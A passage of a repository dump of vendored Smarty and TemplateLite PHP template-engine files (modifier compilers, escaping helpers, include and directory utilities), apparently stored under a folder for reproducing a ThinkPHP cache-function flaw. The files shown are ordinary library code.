14 | * Purpose: count the number of words in a text 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.count.words.php count_words (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_count_words($params, $compiler) 22 | { 23 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 24 | // return 'preg_match_all(\'#[\w\pL]+#u\', ' . $params[0] . ', $tmp)'; 25 | // expression taken from http://de.php.net/manual/en/function.str-word-count.php#85592 26 | return 'preg_match_all(\'/\p{L}[\p{L}\p{Mn}\p{Pd}\\\'\x{2019}]*/u\', ' . $params[0] . ', $tmp)'; 27 | } 28 | // no MBString fallback 29 | return 'str_word_count(' . $params[0] . ')'; 30 | } 31 | 32 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.default.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: default
14 | * Purpose: designate default value for empty variables 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.default.php default (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_default ($params, $compiler) 22 | { 23 | $output = $params[0]; 24 | if (!isset($params[1])) { 25 | $params[1] = "''"; 26 | } 27 | 28 | array_shift($params); 29 | foreach ($params as $param) { 30 | $output = '(($tmp = @' . $output . ')===null||$tmp===\'\' ? ' . $param . ' : $tmp)'; 31 | } 32 | return $output; 33 | } 34 | 35 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.from_charset.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: from_charset
14 | * Purpose: convert character encoding from $charset to internal encoding 15 | * 16 | * @author Rodney Rehm 17 | * @param array $params parameters 18 | * @return string with compiled code 19 | */ 20 | function smarty_modifiercompiler_from_charset($params, $compiler) 21 | { 22 | if (!SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 23 | // FIXME: (rodneyrehm) shouldn't this throw an error? 24 | return $params[0]; 25 | } 26 | 27 | if (!isset($params[1])) { 28 | $params[1] = '"ISO-8859-1"'; 29 | } 30 | 31 | return 'mb_convert_encoding(' . $params[0] . ', SMARTY_RESOURCE_CHAR_SET, ' . $params[1] . ')'; 32 | } 33 | 34 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.indent.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: indent
13 | * Purpose: indent lines of text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.indent.php indent (Smarty online manual) 16 | * @author Uwe Tews 17 | * @param array $params parameters 18 | * @return string with compiled code 19 | */ 20 | 21 | function smarty_modifiercompiler_indent($params, $compiler) 22 | { 23 | if (!isset($params[1])) { 24 | $params[1] = 4; 25 | } 26 | if (!isset($params[2])) { 27 | $params[2] = "' '"; 28 | } 29 | return 'preg_replace(\'!^!m\',str_repeat(' . $params[2] . ',' . $params[1] . '),' . $params[0] . ')'; 30 | } 31 | 32 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.lower.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: lower
13 | * Purpose: convert string to lowercase 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.lower.php lower (Smarty online manual) 16 | * @author Monte Ohrt 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | 22 | function smarty_modifiercompiler_lower($params, $compiler) 23 | { 24 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 25 | return 'mb_strtolower(' . $params[0] . ',SMARTY_RESOURCE_CHAR_SET)' ; 26 | } 27 | // no MBString fallback 28 | return 'strtolower(' . $params[0] . ')'; 29 | } 30 | 31 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.noprint.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: noprint
14 | * Purpose: return an empty string 15 | * 16 | * @author Uwe Tews 17 | * @param array $params parameters 18 | * @return string with compiled code 19 | */ 20 | function smarty_modifiercompiler_noprint($params, $compiler) 21 | { 22 | return "''"; 23 | } 24 | 25 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.string_format.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: string_format
14 | * Purpose: format strings via sprintf 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.string.format.php string_format (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_string_format($params, $compiler) 22 | { 23 | return 'sprintf(' . $params[1] . ',' . $params[0] . ')'; 24 | } 25 | 26 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.strip.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: strip
14 | * Purpose: Replace all repeated spaces, newlines, tabs 15 | * with a single space or supplied replacement string.
16 | * Example: {$var|strip} {$var|strip:" "}
17 | * Date: September 25th, 2002 18 | * 19 | * @link http://www.smarty.net/manual/en/language.modifier.strip.php strip (Smarty online manual) 20 | * @author Uwe Tews 21 | * @param array $params parameters 22 | * @return string with compiled code 23 | */ 24 | 25 | function smarty_modifiercompiler_strip($params, $compiler) 26 | { 27 | if (!isset($params[1])) { 28 | $params[1] = "' '"; 29 | } 30 | return "preg_replace('!\s+!u', {$params[1]},{$params[0]})"; 31 | } 32 | 33 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.strip_tags.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: strip_tags
14 | * Purpose: strip html tags from text 15 | * 16 | * @link http://www.smarty.net/manual/en/language.modifier.strip.tags.php strip_tags (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_strip_tags($params, $compiler) 22 | { 23 | if (!isset($params[1])) { 24 | $params[1] = true; 25 | } 26 | if ($params[1] === true) { 27 | return "preg_replace('!<[^>]*?>!', ' ', {$params[0]})"; 28 | } else { 29 | return 'strip_tags(' . $params[0] . ')'; 30 | } 31 | } 32 | 33 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.to_charset.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: to_charset
14 | * Purpose: convert character encoding from internal encoding to $charset 15 | * 16 | * @author Rodney Rehm 17 | * @param array $params parameters 18 | * @return string with compiled code 19 | */ 20 | function smarty_modifiercompiler_to_charset($params, $compiler) 21 | { 22 | if (!SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 23 | // FIXME: (rodneyrehm) shouldn't this throw an error? 24 | return $params[0]; 25 | } 26 | 27 | if (!isset($params[1])) { 28 | $params[1] = '"ISO-8859-1"'; 29 | } 30 | 31 | return 'mb_convert_encoding(' . $params[0] . ', ' . $params[1] . ', SMARTY_RESOURCE_CHAR_SET)'; 32 | } 33 | 34 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.unescape.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: unescape
14 | * Purpose: unescape html entities 15 | * 16 | * @author Rodney Rehm 17 | * @param array $params parameters 18 | * @return string with compiled code 19 | */ 20 | function smarty_modifiercompiler_unescape($params, $compiler) 21 | { 22 | if (!isset($params[1])) { 23 | $params[1] = 'html'; 24 | } 25 | if (!isset($params[2])) { 26 | $params[2] = "SMARTY_RESOURCE_CHAR_SET"; 27 | } else { 28 | $params[2] = "'" . $params[2] . "'"; 29 | } 30 | 31 | switch (trim($params[1], '"\'')) { 32 | case 'entity': 33 | return 'mb_convert_encoding(' . $params[0] . ', ' . $params[2] . ', \'HTML-ENTITIES\')'; 34 | case 'htmlall': 35 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 36 | return 'mb_convert_encoding(' . $params[0] . ', ' . $params[2] . ', \'HTML-ENTITIES\')'; 37 | } 38 | return 'html_entity_decode(' . $params[0] . ', ENT_QUOTES, ' . $params[2] . ')'; 39 | 40 | case 'html': 41 | return 'htmlspecialchars_decode(' . $params[0] . ', ENT_QUOTES)'; 42 | 43 | default: 44 | return $params[0]; 45 | } 46 | } 47 | 48 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.upper.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: lower
14 | * Purpose: convert string to uppercase 15 | * 16 | * @link http://smarty.php.net/manual/en/language.modifier.upper.php lower (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_upper($params, $compiler) 22 | { 23 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 24 | return 'mb_strtoupper(' . $params[0] . ',SMARTY_RESOURCE_CHAR_SET)' ; 25 | } 26 | // no MBString fallback 27 | return 'strtoupper(' . $params[0] . ')'; 28 | } 29 | 30 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/modifiercompiler.wordwrap.php: -------------------------------------------------------------------------------- 1 | 13 | * Name: wordwrap
14 | * Purpose: wrap a string of text at a given length 15 | * 16 | * @link http://smarty.php.net/manual/en/language.modifier.wordwrap.php wordwrap (Smarty online manual) 17 | * @author Uwe Tews 18 | * @param array $params parameters 19 | * @return string with compiled code 20 | */ 21 | function smarty_modifiercompiler_wordwrap($params, $compiler) 22 | { 23 | if (!isset($params[1])) { 24 | $params[1] = 80; 25 | } 26 | if (!isset($params[2])) { 27 | $params[2] = '"\n"'; 28 | } 29 | if (!isset($params[3])) { 30 | $params[3] = 'false'; 31 | } 32 | $function = 'wordwrap'; 33 | if (SMARTY_MBSTRING /* ^phpunit */&&empty($_SERVER['SMARTY_PHPUNIT_DISABLE_MBSTRING'])/* phpunit$ */) { 34 | if ($compiler->tag_nocache | $compiler->nocache) { 35 | $compiler->template->required_plugins['nocache']['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR .'shared.mb_wordwrap.php'; 36 | $compiler->template->required_plugins['nocache']['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap'; 37 | } else { 38 | $compiler->template->required_plugins['compiled']['wordwrap']['modifier']['file'] = SMARTY_PLUGINS_DIR .'shared.mb_wordwrap.php'; 39 | $compiler->template->required_plugins['compiled']['wordwrap']['modifier']['function'] = 'smarty_mb_wordwrap'; 40 | } 41 | $function = 'smarty_mb_wordwrap'; 42 | } 43 | return $function . '(' . $params[0] . ',' . $params[1] . ',' . $params[2] . ',' . $params[3] . ')'; 44 | } 45 | 46 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/shared.escape_special_chars.php: -------------------------------------------------------------------------------- 1 | =')) { 10 | /** 11 | * escape_special_chars common function 12 | * 13 | * Function: smarty_function_escape_special_chars
14 | * Purpose: used by other smarty functions to escape 15 | * special chars except for already escaped ones 16 | * 17 | * @author Monte Ohrt 18 | * @param string $string text that should by escaped 19 | * @return string 20 | */ 21 | function smarty_function_escape_special_chars($string) 22 | { 23 | if (!is_array($string)) { 24 | $string = htmlspecialchars($string, ENT_COMPAT, SMARTY_RESOURCE_CHAR_SET, false); 25 | } 26 | return $string; 27 | } 28 | } else { 29 | /** 30 | * escape_special_chars common function 31 | * 32 | * Function: smarty_function_escape_special_chars
33 | * Purpose: used by other smarty functions to escape 34 | * special chars except for already escaped ones 35 | * 36 | * @author Monte Ohrt 37 | * @param string $string text that should by escaped 38 | * @return string 39 | */ 40 | function smarty_function_escape_special_chars($string) 41 | { 42 | if (!is_array($string)) { 43 | $string = preg_replace('!&(#?\w+);!', '%%%SMARTY_START%%%\\1%%%SMARTY_END%%%', $string); 44 | $string = htmlspecialchars($string); 45 | $string = str_replace(array('%%%SMARTY_START%%%', '%%%SMARTY_END%%%'), array('&', ';'), $string); 46 | } 47 | return $string; 48 | } 49 | } 50 | 51 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/shared.literal_compiler_param.php: -------------------------------------------------------------------------------- 1 | 11 | * Purpose: used by other smarty functions to make a timestamp from a string. 12 | * 13 | * @author Monte Ohrt 14 | * @param DateTime|int|string $string date object, timestamp or string that can be converted using strtotime() 15 | * @return int 16 | */ 17 | function smarty_make_timestamp($string) 18 | { 19 | if (empty($string)) { 20 | // use "now": 21 | return time(); 22 | } elseif ($string instanceof DateTime) { 23 | return $string->getTimestamp(); 24 | } elseif (strlen($string) == 14 && ctype_digit($string)) { 25 | // it is mysql timestamp format of YYYYMMDDHHMMSS? 26 | return mktime(substr($string, 8, 2),substr($string, 10, 2),substr($string, 12, 2), 27 | substr($string, 4, 2),substr($string, 6, 2),substr($string, 0, 4)); 28 | } elseif (is_numeric($string)) { 29 | // it is a numeric string, we handle it as timestamp 30 | return (int) $string; 31 | } else { 32 | // strtotime should handle it 33 | $time = strtotime($string); 34 | if ($time == -1 || $time === false) { 35 | // strtotime() was not able to parse $string, use "now": 36 | return time(); 37 | } 38 | return $time; 39 | } 40 | } 41 | 42 | ?> 43 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/shared.mb_str_replace.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/shared.mb_unicode.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/plugins/variablefilter.htmlspecialchars.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_internal_compile_append.php: -------------------------------------------------------------------------------- 1 | required_attributes = array('var', 'value'); 32 | $this->shorttag_order = array('var', 'value'); 33 | $this->optional_attributes = array('scope', 'index'); 34 | // check and get attributes 35 | $_attr = $this->getAttributes($compiler, $args); 36 | // map to compile assign attributes 37 | if (isset($_attr['index'])) { 38 | $_params['smarty_internal_index'] = '[' . $_attr['index'] . ']'; 39 | unset($_attr['index']); 40 | } else { 41 | $_params['smarty_internal_index'] = '[]'; 42 | } 43 | $_new_attr = array(); 44 | foreach ($_attr as $key => $value) { 45 | $_new_attr[] = array($key => $value); 46 | } 47 | // call compile assign 48 | return parent::compile($_new_attr, $compiler, $_params); 49 | } 50 | 51 | } 52 | 53 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_internal_compile_debug.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 32 | 33 | // compile always as nocache 34 | $compiler->tag_nocache = true; 35 | 36 | // display debug template 37 | $_output = "smarty->loadPlugin('Smarty_Internal_Debug'); Smarty_Internal_Debug::display_debug(\$_smarty_tpl); ?>"; 38 | return $_output; 39 | } 40 | 41 | } 42 | 43 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_internal_compile_ldelim.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 31 | if ($_attr['nocache'] === true) { 32 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 33 | } 34 | // this tag does not return compiled code 35 | $compiler->has_code = true; 36 | return $compiler->smarty->left_delimiter; 37 | } 38 | 39 | } 40 | 41 | ?> 42 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_internal_compile_rdelim.php: -------------------------------------------------------------------------------- 1 | getAttributes($compiler, $args); 31 | if ($_attr['nocache'] === true) { 32 | $compiler->trigger_template_error('nocache option not allowed', $compiler->lex->taglineno); 33 | } 34 | // this tag does not return compiled code 35 | $compiler->has_code = true; 36 | return $compiler->smarty->right_delimiter; 37 | } 38 | 39 | } 40 | 41 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_internal_get_include_path.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_internal_nocache_insert.php: -------------------------------------------------------------------------------- 1 | assign('{$_assign}' , {$_function} (" . var_export($_attr, true) . ",\$_smarty_tpl), true);?>"; 41 | } else { 42 | $_output .= "echo {$_function}(" . var_export($_attr, true) . ",\$_smarty_tpl);?>"; 43 | } 44 | $_tpl = $_template; 45 | while ($_tpl->parent instanceof Smarty_Internal_Template) { 46 | $_tpl = $_tpl->parent; 47 | } 48 | return "/*%%SmartyNocache:{$_tpl->properties['nocache_hash']}%%*/" . $_output . "/*/%%SmartyNocache:{$_tpl->properties['nocache_hash']}%%*/"; 49 | } 50 | 51 | } 52 | 53 | ?> 54 | -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_resource_recompiled.php: -------------------------------------------------------------------------------- 1 | filepath = false; 30 | $compiled->timestamp = false; 31 | $compiled->exists = false; 32 | } 33 | 34 | } 35 | 36 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/Smarty/sysplugins/smarty_resource_uncompiled.php: -------------------------------------------------------------------------------- 1 | filepath = false; 38 | $compiled->timestamp = false; 39 | $compiled->exists = false; 40 | } 41 | 42 | } 43 | 44 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/compile.compile_custom_block.php: -------------------------------------------------------------------------------- 1 | _plugin_exists($function, "block")) 22 | { 23 | if ($start_tag) 24 | { 25 | $_args = $object->_parse_arguments($arguments); 26 | foreach($_args as $key => $value) 27 | { 28 | if (is_bool($value)) 29 | { 30 | $value = $value ? 'true' : 'false'; 31 | } 32 | if (is_null($value)) 33 | { 34 | $value = 'null'; 35 | } 36 | $_args[$key] = "'$key' => $value"; 37 | } 38 | $_result = "_tag_stack[] = array('$function', array(".implode(',', (array)$_args).")); "; 39 | $_result .= $function . '(array(' . implode(',', (array)$_args) .'), null, $this); '; 40 | $_result .= 'ob_start(); ?>'; 41 | } 42 | else 43 | { 44 | $_result .= '_block_content = ob_get_contents(); ob_end_clean(); '; 45 | $_result .= '$this->_block_content = ' . $function . '($this->_tag_stack[count($this->_tag_stack) - 1][1], $this->_block_content, $this); '; 46 | if (!empty($modifiers)) 47 | { 48 | $_result .= '$this->_block_content = ' . $object->_parse_modifier('$this->_block_content', $modifiers) . '; '; 49 | } 50 | $_result .= 'echo $this->_block_content; array_pop($this->_tag_stack); ?>'; 51 | } 52 | return true; 53 | } 54 | else 55 | { 56 | return false; 57 | } 58 | } 59 | 60 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/compile.compile_custom_function.php: -------------------------------------------------------------------------------- 1 | _plugin_exists($function, "function")) 12 | { 13 | $_args = $object->_parse_arguments($arguments); 14 | foreach($_args as $key => $value) 15 | { 16 | if (is_bool($value)) 17 | { 18 | $value = $value ? 'true' : 'false'; 19 | } 20 | if (is_null($value)) 21 | { 22 | $value = 'null'; 23 | } 24 | $_args[$key] = "'$key' => $value"; 25 | } 26 | $_result = '_parse_modifier($function . '(array(' . implode(',', (array)$_args) . '), $this)', $modifiers) . '; '; 30 | } 31 | else 32 | { 33 | $_result .= $function . '(array(' . implode(',', (array)$_args) . '), $this);'; 34 | } 35 | $_result .= '?>'; 36 | return true; 37 | } 38 | else 39 | { 40 | return false; 41 | } 42 | } 43 | 44 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/compile.generate_compiler_debug_output.php: -------------------------------------------------------------------------------- 1 | _vars;\n"; 12 | $debug_output .= "ksort(\$assigned_vars);\n"; 13 | $debug_output .= "if (@is_array(\$this->_config[0])) {\n"; 14 | $debug_output .= " \$config_vars = \$this->_config[0];\n"; 15 | $debug_output .= " ksort(\$config_vars);\n"; 16 | $debug_output .= " \$this->assign('_debug_config_keys', array_keys(\$config_vars));\n"; 17 | $debug_output .= " \$this->assign('_debug_config_vals', array_values(\$config_vars));\n"; 18 | $debug_output .= "} \n"; 19 | 20 | $debug_output .= "\$included_templates = \$this->_templatelite_debug_info;\n"; 21 | 22 | $debug_output .= "\$this->assign('_debug_keys', array_keys(\$assigned_vars));\n"; 23 | $debug_output .= "\$this->assign('_debug_vals', array_values(\$assigned_vars));\n"; 24 | $debug_output .= "\$this->assign('_debug_tpls', \$included_templates);\n"; 25 | 26 | $debug_output .= "\$this->_templatelite_debug_loop = true;\n"; 27 | $debug_output .= "\$this->_templatelite_debug_dir = \$this->template_dir;\n"; 28 | $debug_output .= "\$this->template_dir = TEMPLATE_LITE_DIR . 'internal/';\n"; 29 | $debug_output .= "echo \$this->_fetch_compile('debug.tpl');\n"; 30 | $debug_output .= "\$this->template_dir = \$this->_templatelite_debug_dir;\n"; 31 | $debug_output .= "\$this->_templatelite_debug_loop = false; \n"; 32 | return $debug_output; 33 | } 34 | 35 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/compile.include.php: -------------------------------------------------------------------------------- 1 | _parse_arguments($arguments); 12 | 13 | $arg_list = array(); 14 | if (empty($_args['file'])) 15 | { 16 | $object->trigger_error("missing 'file' attribute in include tag", E_USER_ERROR, __FILE__, __LINE__); 17 | } 18 | 19 | foreach ($_args as $arg_name => $arg_value) 20 | { 21 | if ($arg_name == 'file') 22 | { 23 | $include_file = $arg_value; 24 | continue; 25 | } 26 | else if ($arg_name == 'assign') 27 | { 28 | $assign_var = $arg_value; 29 | continue; 30 | } 31 | if (is_bool($arg_value)) 32 | { 33 | $arg_value = $arg_value ? 'true' : 'false'; 34 | } 35 | $arg_list[] = "'$arg_name' => $arg_value"; 36 | } 37 | 38 | if (isset($assign_var)) 39 | { 40 | $output = '_vars;' . 41 | "\n\$this->assign(" . $assign_var . ", \$this->_fetch_compile_include(" . $include_file . ", array(".implode(',', (array)$arg_list).")));\n" . 42 | "\$this->_vars = \$_templatelite_tpl_vars;\n" . 43 | "unset(\$_templatelite_tpl_vars);\n" . 44 | ' ?>'; 45 | } 46 | else 47 | { 48 | $output = '_vars;' . 49 | "\necho \$this->_fetch_compile_include(" . $include_file . ", array(".implode(',', (array)$arg_list)."));\n" . 50 | "\$this->_vars = \$_templatelite_tpl_vars;\n" . 51 | "unset(\$_templatelite_tpl_vars);\n" . 52 | ' ?>'; 53 | } 54 | return $output; 55 | } 56 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/compile.parse_is_expr.php: -------------------------------------------------------------------------------- 1 | _parse_variable($expr_arg) . "))"; 30 | } 31 | else 32 | { 33 | $expr = "!(1 & $is_arg)"; 34 | } 35 | break; 36 | 37 | case 'odd': 38 | if (isset($_args[$expr_end]) && $_args[$expr_end] == 'by') 39 | { 40 | $expr_end++; 41 | $expr_arg = $_args[$expr_end++]; 42 | $expr = "(1 & ($is_arg / " . $object->_parse_variable($expr_arg) . "))"; 43 | } 44 | else 45 | { 46 | $expr = "(1 & $is_arg)"; 47 | } 48 | break; 49 | 50 | case 'div': 51 | if (@$_args[$expr_end] == 'by') 52 | { 53 | $expr_end++; 54 | $expr_arg = $_args[$expr_end++]; 55 | $expr = "!($is_arg % " . $object->_parse_variable($expr_arg) . ")"; 56 | } 57 | else 58 | { 59 | $object->trigger_error("expecting 'by' after 'div'", E_USER_ERROR, __FILE__, __LINE__); 60 | } 61 | break; 62 | 63 | default: 64 | $object->trigger_error("unknown 'is' expression - '$expr_type'", E_USER_ERROR, __FILE__, __LINE__); 65 | break; 66 | } 67 | 68 | if ($negate_expr) { 69 | $expr = "!($expr)"; 70 | } 71 | 72 | array_splice($_args, 0, $expr_end, $expr); 73 | 74 | return $_args; 75 | } 76 | 77 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/template.build_dir.php: -------------------------------------------------------------------------------- 1 | _get_dir($dir); 15 | } 16 | $_result = $object->_get_dir($dir); 17 | foreach($_args as $value) 18 | { 19 | $_result .= $value.DIRECTORY_SEPARATOR; 20 | if (!is_dir($_result)) 21 | { 22 | @mkdir($_result, 0777); 23 | } 24 | } 25 | return $_result; 26 | } 27 | 28 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/template.destroy_dir.php: -------------------------------------------------------------------------------- 1 | template_dir = $object->_get_dir($object->template_dir); 32 | 33 | $name = ($object->encode_file_name) ? md5($object->template_dir.$file).'.php' : str_replace(".", "_", str_replace("/", "_", $file)).'.php'; 34 | @unlink($dir.$name); 35 | } 36 | else 37 | { 38 | $_args = ""; 39 | foreach(explode('|', $id) as $value) 40 | { 41 | $_args .= $value.DIRECTORY_SEPARATOR; 42 | } 43 | template_rm_dir($dir.DIRECTORY_SEPARATOR.$_args); 44 | } 45 | } 46 | } 47 | 48 | function template_rm_dir($dir) 49 | { 50 | if (is_file(substr($dir, 0, -1))) 51 | { 52 | @unlink(substr($dir, 0, -1)); 53 | return; 54 | } 55 | if ($d = opendir($dir)) 56 | { 57 | while(($f = readdir($d)) !== false) 58 | { 59 | if ($f != '.' && $f != '..') 60 | { 61 | template_rm_dir($dir.$f.DIRECTORY_SEPARATOR, $object); 62 | } 63 | } 64 | @rmdir($dir.$f); 65 | } 66 | } 67 | 68 | ?> -------------------------------------------------------------------------------- /ThinkPHP/ThinkPHP_3.2.3-5.0.10_缓存函数设计缺陷/tp3.2.3/ThinkPHP/Library/Vendor/TemplateLite/internal/template.fetch_compile_include.php: -------------------------------------------------------------------------------- 1 | debugging) 12 | { 13 | $object->_templatelite_debug_info[] = array('type' => 'template', 14 | 'filename' => $_templatelite_include_file, 15 | 'depth' => ++$object->_inclusion_depth, 16 | 'exec_time' => array_sum(explode(' ', microtime())) ); 17 | $included_tpls_idx = count($object->_templatelite_debug_info) - 1; 18 | } 19 | 20 | $object->_vars = array_merge($object->_vars, $_templatelite_include_vars); 21 | $_templatelite_include_file = $object->_get_resource($_templatelite_include_file); 22 | if(isset($object->_confs[0])) 23 | { 24 | array_unshift($object->_confs, $object->_confs[0]); 25 | $_compiled_output = 